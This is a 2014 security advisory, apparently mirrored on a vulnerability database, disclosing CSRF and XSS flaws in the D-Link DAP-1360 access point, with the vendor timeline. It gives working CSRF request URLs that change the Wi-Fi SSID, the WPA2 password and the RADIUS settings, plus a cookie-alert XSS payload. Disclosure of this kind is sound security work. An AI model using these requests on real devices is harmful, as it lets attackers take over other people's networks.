Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:31476
HistoryDec 02, 2014 - 12:00 a.m.

CSRF and XSS vulnerabilities in D-Link DAP-1360

2014-12-0200:00:00
vulners.com
34
JSON

Hello 3APA3A!

There are Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

In addition to previous Abuse of Functionality, Brute Force, Information Leakage, Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities in DAP-1360, which I wrote about earlier.

Affected products:

Vulnerable is the next model: D-Link DAP-1360, Firmware 1.0.0. This model with other firmware versions also must be vulnerable.

D-Link will fix these vulnerabilities in the next version of firmware, as they answered me in October. But in November they answered me, that firmware still was not publicly released due to the bugs and they need to work on it. Also D-Link delayed with fixing vulnerabilities in DCS-2103 (some of them I already disclosed recently and there are many other holes, about which I informed them). I found this and other web cameras during summer to watch terrorists activities in Donetsk and Lugansks regions of Ukraine. Read about my video and audio reconnaissance (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2014-November/009062.html).

I tested model DAP-1360/B/D1B. There are three models of DAP-1360:

DAP-1360/B1A (f/w ver 2.xx) - D-Link will not add fixes, it's EOL device.
DAP-1360/B/D1B (f/w ver 1.x.x - 2.x.x) - D-Link will fix the vulnerabilities in new firmware, which will be released in November.
DAP-1360/A/E1A (f/w ver 2.5.4 or later) - the first public firmware includes fixes for the vulnerabilities.

Details:

CSRF (WASC-09):

In section Wi-Fi - Basic settings it's possible to change parameters: Hide Access Point, SSID, Country, Channel, Wireless mode, Max Associated Clients.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=35&res_struct_size=0&res_buf={%22HideSSID%22:false,%22mbssid%22:[{%22SSID%22:%221%22}],%22CountryCode%22:%22UA%22,%22Channel%22:%22auto%22,%22WirelessMode%22:%229%22,%22MaxStaNum%22:%220%22}

In section Wi-Fi - Security settings it's possible to change parameters: Network Authentication, Encryption Key PSK, WPA2 Pre-authentication (at selected WPA2), WPA Encryption, WPA reneval. And also some parameters, such as RADIUS_Server, RADIUS_Port and RADIUS_Key, which are not present in GUI.

http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=36&res_struct_size=0&res_buf={%22RekeyInterval%22:%223600%22,%22mbssid%22:[{%22AuthMode%22:%22WPA2PSK%22,%22WPAPSK%22:%22password%22,%22PreAuth%22:false,%22EncrypType%22:%22AES%22}],%22RADIUS_Server%22:%22192.168.0.254%22,%22RADIUS_Port%22:%221812%22,%22RADIUS_Key%22:%22dlink%22}

With this request all above-mentioned parameters are changing, including the password of Access Point.

XSS (WASC-08):

Insert <script>alert(document.cookie)</script> into Quick search. This is Strictly Social XSS.

Timeline:

2014.05.22 - informed developer about multiple vulnerabilities.
2014.06.28 - announced at my site about new vulnerabilities in DAP-1360.
2014.11.29 - disclosed at my site (http://websecurity.com.ua/7234/&#41;.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON